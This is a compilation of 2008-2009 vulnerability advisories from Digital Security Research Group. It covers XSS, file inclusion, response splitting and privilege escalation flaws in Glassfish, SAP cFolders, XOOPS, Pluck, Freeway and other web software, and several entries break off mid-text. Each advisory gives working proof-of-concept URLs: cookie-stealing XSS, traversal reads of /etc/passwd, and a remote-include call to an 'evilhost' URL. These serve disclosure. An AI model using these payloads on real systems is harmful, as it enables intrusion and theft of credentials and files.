[DSECRG-09-034] Sun Glassfish Enterprise Server - Multiple Linked XSS vulnerabilies
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-034 Original advisory: http://dsecrg.com/pages/vul/show.php?id=134 Application:Sun Glassfish Enterprise Server Versions Affected: 2.1 Vendor URL: https://glassfish.dev.java.net/ Bug:Multiple Linked XSS vulnerabilities Exploits: YES Reported: 19.03.2009 Vendor response:20.03.2009 Solution: YES Date of Public Advisory:05.05.2009 Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** Glassfish Enterprise Server Admin Console has multiple linked XSS vulnerabilities. Details *** Using this vulnerability attacker can steal admin's cookie and then authentificate as administrator or perform certain administrative actions. 1. Multiple Linked XSS vulnerabilities. Many pages have typical XSS vulnerability. Attacker can inject XSS in URL string. Example: http://[server]/applications/applications.jsf?');};alert(DSecRG_XSS);/script!-- http://[server]/configuration/configuration.jsf?');};alert(DSecRG_XSS);/script!-- http://[server]/customMBeans/customMBeans.jsf?');};alert(DSecRG_XSS);/script!-- http://[server]/resourceNode/resources.jsf?');};alert(DSecRG_XSS);/script!-- http://[server]/sysnet/registration.jsf?');};alert(DSecRG_XSS);/script!-- http://[server]/webService/webServicesGeneral.jsf?');};alert(DSecRG_XSS);/script!-- Response HTML Code: --- # ... script type=text/javascript var myonload = new Object(); myonload.oldonload = window.onload; myonload.newonload = function() { if ('/applications/applications.jsf?');};alert(DSecRG_XSS);/script!--' != '') { ... # 2. Multiple Linked XSS vulnerabilities in GET parameter name. Many pages have typical XSS vulnerability in GET parameter name. Attacker can inject XSS in URL string. Example: http://[server]/configuration/auditModuleEdit.jsf?name=IMG SRC=javascript:alert('DSecRG_XSS') http://[server]/configuration/httpListenerEdit.jsf?name=IMG SRC=javascript:alert('DSecRG_XSS')configName=server-config http://[server]/resourceNode/jdbcResourceEdit.jsf?name=IMG SRC=javascript:alert('DSecRG_XSS') Solution This security vulnerabilities fixed in CVS. The following links to the commit email messages for all the changes to fix these issues: https://glassfish.dev.java.net/servlets/ReadMsg?list=cvsmsgNo=29669 https://glassfish.dev.java.net/servlets/ReadMsg?list=cvsmsgNo=29668 https://glassfish.dev.java.net/servlets/ReadMsg?list=cvsmsgNo=29675 Credits *** http://www.nabble.com/Re:--DSECRG--Sun-Glassfish-Multiple-Security-Vulnerabilities-p23002524.html About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru
[DSECRG-09-038] Sun Glassfish Woodstock Project - Linked XSS Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-038 Original advisory: http://dsecrg.com/pages/vul/show.php?id=138 Application:Sun Glassfish Woodstock Project (part of Glassfish Enterprise Server) Versions Affected: 4.2 Vendor URL: https://woodstock.dev.java.net/ Bug:Linked XSS Vulnerability Exploits: YES Reported: 19.03.2009 Vendor response:20.03.2009 Solution: YES Date of Public Advisory:05.05.2009 Author: Digital Security Research Group [DSecRG] (research [at] dsecrg [dot] com) Description *** Woodstock components are User Interface Components for the web, based on Java Server Faces and AJAX. Woodstock also is part Glassfish Enterprise Server. Woodstock has linked XSS vulnerability in 404 Error page. Details *** Using this vulnerability attacker can steal admin's cookie and then authentificate as administrator or perform certain administrative actions. Attacker can inject XSS in URL string using UTF-7 encoding. Exploiting this issue required Auto-Select encoding in browser configuration. Example: http://[server]/theme/META-INF/+ACJ-+AD4APB-SCRIPT+AD7-alert(+ACI-DSecRG_XSS+ACI-)+ADz-/SCRIPT+AD7- Solution This security vulnerabilities fixed in CVS. The following link to the commit email message for the changes to fix these issue: https://woodstock.dev.java.net/servlets/ReadMsg?list=cvsmsgNo=4041 Credits *** http://www.nabble.com/Re:--DSECRG--Sun-Glassfish-Multiple-Security-Vulnerabilities-p23002524.html About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru
SAP Cfolders Multiple Linked XSS Vulnerabilities
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-021 Original advisory: http://dsecrg.com/pages/vul/show.php?id=121 Application:SAP Cfolders (SAP SRM, SAP ECC, SAP Knowledge Management and SAP NetWeaver cRooms (collaboration rooms)) Vendor URL: http://SAP.com Bugs: Multiple Liked XSS Risk: Hight Exploits: YES Reported: 12.01.2009 Vendor response:13.01.2009 patched:21.01.2009 Date of Public Advisory:21.04.2009 Reference: SAP note 1292875 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** cFolders (Collaboration Folders) is the SAP web-based application for collaborative sharing of information. cFolders is part of a suite of applications powered by SAP® NetWeaver™ that integrate project management, knowledge management and resource management in collaborative inter-enterprise and intra-enterprise environments. cFolders is integrated to SAP ECC, SAP Product Lifecycle Management (PLM), SAP Supplier Relationship Management (SRM), SAP Knowledge Management and SAP NetWeaver™ cRooms (collaboration rooms). Virtual teams can access, view online, subscribe for changes, and redline documents and product information. Partners and suppliers can interact with cFolders in predefined collaborative or competitive scenarios. Details *** Multiple Linked XSS vulnerabilities found in SAP Cfolders engine. Any user can cheate a vulnerable link and steal user's or administrator's cookie. He can do this using 3 Linked XSS vulnerabilities. 1. Linked XSS found in col_table_filter.htm page. Vulnerable parameter p_current_role Example: https://sapserver/sap/bc/bsp/sap/cfx_rfc_ui/col_table_filter.htm?p_current_role=IMG/SRC=JaVaScRiPt:alert('DSECRG') 2. Linked XSS found in me_ov.htm page. Vulnerable parameter p_current_role Example: https://sapserver/sap/bc/bsp/sap/cfx_rfc_ui/me_ov.htm?p_current_role= IMG/SRC=JaVaScRiPt:alert('DSECRG') Fix Information *** The issue has been solved. See SAP note 1292875. References: *** SAP note 1292875 https://service.sap.com/sap/support/notes/1292875 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru
SAP Cfolders Multiple Stored XSS Vulnerabilies
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-014 Original advisory: http://dsecrg.com/pages/vul/show.php?id=114 Application:SAP Cfolders (included in: SAP SRM, SAP ECC, SAP Knowledge Management and SAP NetWeaver cRooms) Vendor URL: http://SAP.com Bugs: Multiple Stored XSS Risk: Hight Exploits: YES Reported: 04.12.2008 Vendor response:05.12.2008 Vulnerability patched: 15.12.2008 Date of Public Advisory:21.04.2009 Reference: SAP note 1284360 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** cFolders (Collaboration Folders) is the SAP web-based application for collaborative sharing of information. cFolders is part of a suite of applications powered by SAP NetWeaver that integrate project management, knowledge management and resource management in collaborative inter-enterprise and intra-enterprise environments. cFolders is integrated to SAP ECC, SAP Product Lifecycle Management (PLM), SAP Supplier Relationship Management (SRM), SAP Knowledge Management and SAP NetWeaver cRooms (collaboration rooms). Virtual teams can access, view online, subscribe for changes, and redline documents and product information. Partners and suppliers can interact with cFolders in predefined collaborative or competitive scenarios. Details *** Multiple Stored XSS vulnerabilities found in SAP Cfolders engine. User which is a business partner of organization can steal Administrators cookie by inserting javascript into CFolders system. He can do this using 2 Stored XSS vulnerabilities. SAP Server dont associate session identificators with users IP adress or with any other additional data. IT autentificate users Only by cookies. So any user which can steal administrators cookie can use them to authentificate with administrator rights. 1. User can insert javascript code into site using link creation option He can inject javascript code into LINK field on page https://[site]/sap/bc/bsp/sap/cfx_rfc_ui/hyp_de_create.htm example LINK value: http://test.com; onmouseover=alert(document.cookie) Then when administrator will browse for user folders script will execute. 2. Second XSS vulnerability found in document uploading area. User can create a document with file name included javascript code. example filename value: scriptalert()/script.doc To do this user must change file name in http request when sending a request for file uploading. So using this vulnerability user can steal cookie like he do in first example. Fix Information *** The issue has been solved. See SAP note 1284360. References: *** SAP note 1284360 https://service.sap.com/sap/support/notes/1284360 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru
[DSECRG-09-009] APC PowerChute Network Shutdown's Web Interface - XSS vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-009 --link to original advisory -- http://www.dsecrg.com/pages/vul/show.php?id=82 Application:APC PowerChute Network Shutdown's Web Interface Vendor URL: http://www.apc.com/ Bug:XSS/Response Splitting Exploits: YES Reported: 20.10.2008 Vendor Response:20.10.2008 Vendor Reference: 081020-000796 Solution: Use Firewall Date of Public Advisory:26.02.2009 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Linked XSS and Response Splitting vulnerabilities found in APC PowerChute Network Shutdown's Web Interface. Details *** 1. Linked XSS Vulnerability found in script /security/applet vulnerable parameter - referrer Example *** GET /security/applet?referrer='img/src=javascript:alert('DSECRG_XSS') 2. Response Splitting Vulnerability found in script contexthelp. vulnerable parameter - page Example *** GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0 response: HTTP/1.0 302 Moved temporarily Content-Length: 0 Date: Чт, 25 сен 2008 10:47:42 GMT Server: Acme.Serve/v1.7 of 13nov96 Connection: close Expires: 0 Cache-Control: no-cache Content-type: text/html Location: help/english/Foobar? DSECRG_HEADER:testvalue Content-type: text/html Solution http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539 A low-risk web interface vulnerability has been discovered in the PowerChute Business Edition Shutdown Agent. This issue is scheduled to be addressed in a release of the application. While the severity of this vulnerability has been determined to be minimal, it is recommended that user's continue to ensure the highest level of protection possible through the placement of PowerChute Business Edition behind a firewall. References ** http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com
[DSECRG-09-008] JOnAS(4.10.3) - Linked XSS Vulnerability
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-008 --link to original advisory -- http://www.dsecrg.com/pages/vul/show.php?id=81 Application:JOnAS (Java Open Application Server) Versions Affected: JOnAS(4.10.3) / Apache Tomcat (5.5.26) Vendor URL: http://wiki.jonas.objectweb.org/ Bugs: Linked XSS Exploits: YES Reported: 21.01.2009 Vendor response:NONE Second Reported:29.01.2009 Vendor response:NONE Date of Public Advisory:25.02.2009 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** JOnAS is a leading edge Open Source implementation by OW2 of the Java EE specification Linked XSS vulnerability found in JOnAS engine. Using this vulnerabilities attacker can steal admin's cookie and then authentificate as administrator or perform certain administrative actions. Details *** Linked XSS vulnerabilities found in script ListMBeanDetails.do. vulnerable parameter select. In normal case select parameter looks like this: select=jonas:j2eeType=EJBModule when we try to include another variable with te same name, for example like this: select=jonas:j2eeType=EJBModule,j2eeType=EJBModule So we will see the error page which will tell us that j2eeType variable are also defined. When we include javascipt code into variable name it will appear in error page: select=jonas:j2eeTypescriptalert()/script=EJBModule,j2eeTypescriptalert()/script=EJBModule Example *** http://localhost:9000/jonasAdmin/ListMBeanDetails.do?select=jonas%3Aj2eeTypescriptalert('DSecRG%20XSS')/script%3DEJBModule%2Cj2eeTypescriptalert('DSecRG%20XSS')/script%3DEJBModule Fix Information *** No patches aviable. We did not get any response from vendor for more than 2 weeks. About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsecrg [dot] com http://www.dsecrg.com http://www.dsec.ru Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: resea...@dsecrg.com www.dsecrg.com --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-09-004] AXIS 70U Network Document Server - Privilege Escalation and XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-004 AXIS 70U Network Document Server - Privilege Escalation and XSS http://dsecrg.com/pages/vul/show.php?id=60 Application:AXIS 70U Network Document Server (Web Interface) Versions Affected: 3.0 Vendor URL: http://www.axis.com/ Bug:Local File Include and Privilege Escalation, Multiple Linked XSS Exploits: YES Reported: 20.10.2008 Vendor response:20.10.2008 Last response: 02.01.2009 Vendor Case ID: 143027 Solution: NONE Date of Public Advisory:19.01.2009 Authors:Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Vulnerabilities found in Web Interface of device AXIS 70U Network Document Server. 1. Local File Include and Privilege Escalation. Standard user can escalate privileges to administrator. 2. Multiple Linked XSS vulnerabilities Details *** 1. Local File Include and Privilege Escalation. Local File Include vulnerability found in script user/help/help.shtml User can unclude any local files even in admin folder. Example: http://[server]/user/help/help.shtml?/admin/this_server/this_server.shtml 2. Multiple Linked XSS vulnerabilities Linked XSS vulnerability found in scripts: user/help/help.shtml user/help/general_help_user.shtml Attacker can inject XSS script in URL. Example: http://[server]/user/help/help.shtml?scriptalert('DSecRG XSS')/script http://[server]/user/help/general_help_user.shtml?scriptalert('DSecRG XSS')/script Solution Vendor decided that this vulnerability is not critical and there is no patches for this firmware. But maybe he will patch issues on the next firmware release Vendore response: [13.01.2009]: We don't see any major vulnerability issues with the current firmware of Axis 70U but we will consider the mentioned issues on the next firmware release. About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsecrg.com http://www.dsec.ru
Digital Security opens a site of its research center DSec Research Group
Digital Security opens a site of its research center DSec Research Group Digital Security opens a site of its research center DSec Research Group [DSecRG], the main mission of which is to conduct researches of different application and system vulnerabilities. The result of this work is then used by the experts of the Digital Security audit department for assessing the security level of information systems with the use of active audit methods and also while carrying out penetration tests. Data about the vulnerabilities found by DSecRG experts is published in SecurityFocus mailing lists, Milw0rm.com portal and now it is available at DSecRG website ( www.dsecrg.com ) in the form of advisories and whitepapers. Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: resea...@dsec.ru www.dsecrg.com www.dsec.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[DSECRG-08-040] Multiple Local File Include Vulnerabilities in Xoops 2.3.x
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-040 Application:XOOPS Versions Affected: 2.3.1 Vendor URL: http://www.xoops.org/ Bug:Multiple Local File Include Exploits: YES Reported: 10.11.2008 Vendor response:10.11.2008 Solution: YES Date of Public Advisory:08.12.2008 Authors:Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** XOOPS has Multiple Local File Include vulnerabilities. Details *** Local File Include vulnerability found in scripts: xoops_lib/modules/protector/blocks.php xoops_lib/modules/protector/main.php Successful exploitation requires that register_globals is enabled. Code # $mytrustdirname = basename( dirname( __FILE__ ) ) ; $mytrustdirpath = dirname( __FILE__ ) ; // language files $language = empty( $xoopsConfig['language'] ) ? 'english' : $xoopsConfig['language'] ; if( file_exists( $mydirpath/language/$language/main.php ) ) { // user customized language file (already read by common.php) // include_once $mydirpath/language/$language/main.php ; } else if( file_exists( $mytrustdirpath/language/$language/main.php ) ) { // default language file include_once $mytrustdirpath/language/$language/main.php ; ... # For successful exploitation first condition in if..else statement must be not true. Example: http://[server]/[installdir]/xoops_lib/modules/protector/blocks.php?mydirpath=DSecRG/DSecRG/DSecRGxoopsConfig[language]=../../../../../../../boot.ini%00 http://[server]/[installdir]/xoops_lib/modules/protector/main.php?mydirpath=DSecRG/DSecRG/DSecRGxoopsConfig[language]=../../../../../../../boot.ini%00 Solution Vendor fixed this flaw on 26.11.2008. XOOPS 2.3.2a Security Release can be download from Sourceforge repository: https://sourceforge.net/project/showfiles.php?group_id=41586package_id=153583release_id=643010 Release notes: http://www.xoops.org/modules/news/article.php?storyid=4540 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-039] Local File Include Vulnerability in Pluck CMS 4.5.3
Hello, bugtraq. Digital Security Research Group [DSecRG] Advisory #DSECRG-08-039 Application:Pluck CMS Versions Affected: 4.5.3 Vendor URL: http://www.pluck-cms.org/ Bug:Local File Include Exploits: YES Reported: 25.08.2008 Vendor Response:30.08.2008 Solution: YES Date of Public Advisory:18.11.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Pluck CMS has Local File Include vulnerability. Details *** 1. Local File Include vulnerability found in script data/inc/lib/pcltar.lib.php Successful exploitation requires that register_globals is enabled. Code # if (!isset($g_pcltar_lib_dir)) $g_pcltar_lib_dir = lib; ... $g_pcltar_extension = php; if (!defined(PCLERROR_LIB)) { include(data/inc/$g_pcltar_lib_dir/pclerror.lib.$g_pcltar_extension); } if (!defined(PCLTRACE_LIB)) { include(data/inc/$g_pcltar_lib_dir/pcltrace.lib.$g_pcltar_extension); } # Example: http://[server]/[installdir]/data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=../../../../../../../../../../../../../etc/passwd%00 Solution Vendor fix this flaw on 09.08.2008. New version of Pluck CMS 4.6 can be download here: http://www.pluck-cms.org/downloads/click.php?id=8 About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-038] Multiple Local File Include Vulnerabilities in ezContents CMS 2.0.3
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-038 Application:ezContents CMS Versions Affected: 2.0.3 Application URL:http://www.ezcontents.org/ Vendor URL: http://www.visualshapers.com/ Bug:Multiple Local File Include Exploits: YES Reported: 05.08.2008 Second report: 18.08.2008 Vendor Response:NONE Solution: NONE Date of Public Advisory:25.08.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** ezContents CMS has Multiple Local File Include vulnerabilities. Details *** 1. Local File Include vulnerability found in script /module.php Vulnerable GET parameter link. First discovered by Zero_X [http://secunia.com/advisories/10604/]. Vendor fixed vulnerability in version 2.0.3 by adding verification for this parameter. However, attacker still can include local files. Code [line 32-42, 141-145] -- # $GLOBALS[rootdp] = './'; require_once ($GLOBALS[rootdp].include/config.php); require_once ($GLOBALS[rootdp].include/db.php); require_once ($GLOBALS[rootdp].include/session.php); include_once ($GLOBALS[rootdp].$GLOBALS[modules_home].modfunctions.php); if ((!isset($HTTP_GET_VARS[ezSID])) (isset($HTTP_POST_VARS[ezSID]))) $HTTP_GET_VARS[ezSID] = $HTTP_POST_VARS[ezSID]; if ((!isset($HTTP_GET_VARS[link])) (isset($HTTP_POST_VARS[link]))) $HTTP_GET_VARS[link] = $HTTP_POST_VARS[link]; $HTTP_GET_VARS[link] = str_replace('../', '', $HTTP_GET_VARS[link]); ... if (isExternalLink ($HTTP_GET_VARS[link])) { ECHO 'Remote Code Execution Patch Installed on this implementation of ezContents'; } else { include($GLOBALS[rootdp].$HTTP_GET_VARS[link]); } # isExternalLink() function in script /include/functions.php checks for remote inclusion attempts. Code [line 768-779] --- # function isExternalLink ($linkref) { if ( (substr($linkref,0,5) == 'http:') || (substr($linkref,0,6) == 'https:') || (substr($linkref,0,5) == 'file:') || (substr($linkref,0,4) == 'ftp:') || (substr($linkref,0,7) == 'gopher:')|| (substr($linkref,0,7) == 'mailto:') || (substr($linkref,0,5) == 'news:') || (substr($linkref,0,7) == 'telnet:') || (substr($linkref,0,5) == 'wais:') ) { return True; } else { return False; } } // isExternalLink # Example: http://[server]/[installdir]/module.php?link=//////////////////////////etc/passwd 2. Local File Include vulnerabilities found in scripts /modules/diary/showdiary.php /modules/diary/showeventlist.php /modules/gallery/showgallery.php /modules/reviews/showreviews.php Successful exploitation requires that register_globals is enabled. Code [showdiary.php, line 32-45] # global $HTTP_SERVER_VARS; if ( (substr($HTTP_SERVER_VARS[PHP_SELF],-11) == 'control.php') || (substr($HTTP_SERVER_VARS[PHP_SELF],-10) == 'module.php') || (substr($HTTP_SERVER_VARS[PHP_SELF],-16) == 'showcontents.php') ) { require_once('./modules/moduleSec.php'); } else { require_once('../moduleSec.php'); } $GLOBALS[ModuleName] = 'diary'; if (!isset($GLOBALS[gsLanguage])) { Header(Location: .$GLOBALS[rootdp].module.php?link=.$GLOBALS[modules_home].$GLOBALS[ModuleRef]./showdiary.php); } include_once ($GLOBALS[language_home].$GLOBALS[gsLanguage]./lang_admin.php); include_once ($GLOBALS[language_home].$GLOBALS[gsLanguage]./lang_main.php); # Script /modules/moduleSec.php checks for inclusion attempts. Code # function moduleExternalLink ($linkref) { if ($linkref != '') { if ( (substr($linkref,0,5) == 'http:') || (substr($linkref,0,6) == 'https:') || (substr($linkref,0,5) == 'file:') || (substr($linkref,0,4) == 'ftp:') || (substr($linkref,0,7) == 'gopher:')|| (substr($linkref,0,7) == 'mailto:') || (substr($linkref,0,5) == 'news:') || (substr($linkref,0,7) == 'telnet:') || (substr($linkref,0,5) == 'wais:') ) { return True; } else { return False; } } else
[DSECRG-08-036] Multiple Security Vulnerabilities in Freeway eCommerce 1.4.1.171
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-036 Application:Freeway eCommerce Versions Affected: 1.4.1.171 Vendor URL: http://www.openfreeway.org/ Bugs: RFI, Multiple LFI, XSS Exploits: YES Reported: 27.06.2008 Second report: 04.07.2008 Vendor response:06.07.2008 Solution: YES Date of Public Advisory:18.08.2008 Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Freeway eCommerce system has multiple security vulnerabilities: 1. Multiple Remote/Local File Include 2. Linked XSS vulnerability Details *** 1. Freeway eCommerce has Multiple Remote/Local File Include vulnerabilities. 1.1 Remote File Include vulnerability found in script admin/create_order_new.php Vulnerable GET parameter include_page. Code # ... $command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:''; ... if($command!=) { switch($command){ ... case 'include_page': require($HTTP_GET_VARS['include_page']); break; ... # Example: http://[server]/[installdir]/admin/create_order_new.php?command=include_pageinclude_page=http://evilhost/info.php 1.2 Local File Include vulnerability found in script includes/events_application_top.php Successful exploitation requires that register_globals is enabled. Code # require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_EVENTS_MESSAGES_MAIL); # Example: http://[server]/[installdir]/includes/events_application_top.php?language=../../../../../../../../../../../../../etc/passwd%00 1.3 Local File Include vulnerabilities found in scripts includes/languages/english/account.php includes/languages/french/account.php Successful exploitation requires that register_globals is enabled. Code # require(DIR_WS_LANGUAGES . $language . /events_account.php); # Example: http://[server]/[installdir]/includes/languages/english/account.php?language=../../../../../../../../../../../../../etc/passwd%00 1.4 Local File Include vulnerability found in script includes/languages/french/account_newsletters.php Successful exploitation requires that register_globals is enabled. Code # require(DIR_WS_LANGUAGES . $language . /events_account_newsletters.php); # Example: http://[server]/[installdir]/includes/languages/french/account_newsletters.php?language=../../../../../../../../../../../../../etc/passwd%00 1.5 Local File Include vulnerability found in script includes/modules/faqdesk/faqdesk_article_require.php Successful exploitation requires that register_globals is enabled. Code # //require('includes/application_top.php'); require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_FAQDESK_REVIEWS_ARTICLE); # Example: http://[server]/[installdir]/includes/modules/faqdesk/faqdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00 1.6 Local File Include vulnerability found in script includes/modules/newsdesk/newsdesk_article_require.php Successful exploitation requires that register_globals is enabled. Code # //require('includes/application_top.php'); require(DIR_WS_LANGUAGES . $language . '/' . FILENAME_NEWSDESK_REVIEWS_ARTICLE); # Example: http://[server]/[installdir]/includes/modules/newsdesk/newsdesk_article_require.php?language=../../../../../../../../../../../../../etc/passwd%00 1.7 Local File Include vulnerability found in script templates/Freeway/boxes/card1.php Successful exploitation requires that register_globals is enabled. Code # require(DIR_WS_LANGUAGES . $language . '/cards1_box.php'); # Example: http://[server]/[installdir]/templates/Freeway/boxes/card1.php?language=../../../../../../../../../../../../../etc/passwd%00 1.8 Local File Include vulnerability found in script templates/Freeway/boxes/loginbox.php Successful exploitation requires that register_globals is enabled. Code # require(DIR_WS_LANGUAGES . $language . '/loginbox.php
[DSECRG-08-035] Local File Include Vulnerability in Gallery 1.5.7, 1.6-alpha3
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-035 Application:Gallery Versions Affected: 1.5.7, 1.6-alpha3 Vendor URL: http://gallery.menalto.com/ Bug:Local File Include Exploits: YES Reported: 14.07.2008 Vendor response:15.07.2008 Solution: YES Date of Public Advisory:08.08.2008 Authors:Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Gallery system has local file include vulnerability in script contrib/phpBB2/modules.php Successful exploitation requires that register_globals is enabled. Code # switch ($_REQUEST['op']) { case 'modload': // Added with changes in Security for PhpBB2. define('IN_PHPBB', true); define (LOADED_AS_MODULE,1); $phpbb_root_path = ./; // connect to phpbb include_once($phpbb_root_path . 'extension.inc'); include_once($phpbb_root_path . 'common.'.$phpEx); include_once($phpbb_root_path . 'includes/functions.'.$phpEx); # Example: http://[server]/[installdir]/contrib/phpBB2/modules.php?op=modloadphpEx=../../../../../../../../../../../../../etc/passwd Solution Vendor fix this flaw on 05.08.2008. Download Gallery 1.5.8 and 1.6-RC1 from download page on SourceForge: http://sourceforge.net/project/showfiles.php?group_id=7130package_id=7239abmode=1 More information about release: http://gallery.menalto.com/gallery_1.5.8_released About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-034] Local File Include Vulnerability in Minishowcase v09b136
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-034 Application:Minishowcase Image Gallery Versions Affected: v09b136 Vendor URL: http://minishowcase.frwrd.net Bug:Local File Include Exploits: YES Reported: 14.07.2008 Second report: 22.07.2008 Vendor response:NONE Solution: NONE Date of Public Advisory:29.07.2008 Authors:Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru) Description *** Minishowcase Image Gallery has local file include vulnerability in script libraries/general.init.php Vulnerable GET parameters lang. Successful exploitation requires that register_globals is enabled. Code # ... $_dir_file = dirname(dirname(__FILE__)); $_dir_path = dirname($_SERVER[DOCUMENT_ROOT] . $_SERVER['PHP_SELF']); if ($_dir_file != $_dir_path) { if (!isset($settings['minishowcase_url']) || ($settings['minishowcase_url'] == )) { die (p style=\margin:6px;padding:20px;text-align:left;font-size:18px;background:#f60;color:#FFF;\ALERT: if you are including minishowcase with PHP into a website, please set the code\$minishowcase_url/code variable in the code/config/settings.php/code file/p); } } ... if (isset($_GET[lang])) $set_language = $_GET[lang]; $langfile = ROOT.'languages/'.$set_language.'.php'; require_once($langfile); # Example: http://[server]/[installdir]/libraries/general.init.php?settings[minishowcase_url]=DSecRGlang=../../../../../../../../../../../../../etc/passwd%00 Solution No response or any updates from vendor. About * Digital Security is leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems with vulnerability reports, advisories and whitepapers posted regularly on our website. Contact:research [at] dsec [dot] ru http://www.dsec.ru (in Russian)
[DSECRG-08-032] Claroline 1.8.10 Multiple XSS Vulnerabilities
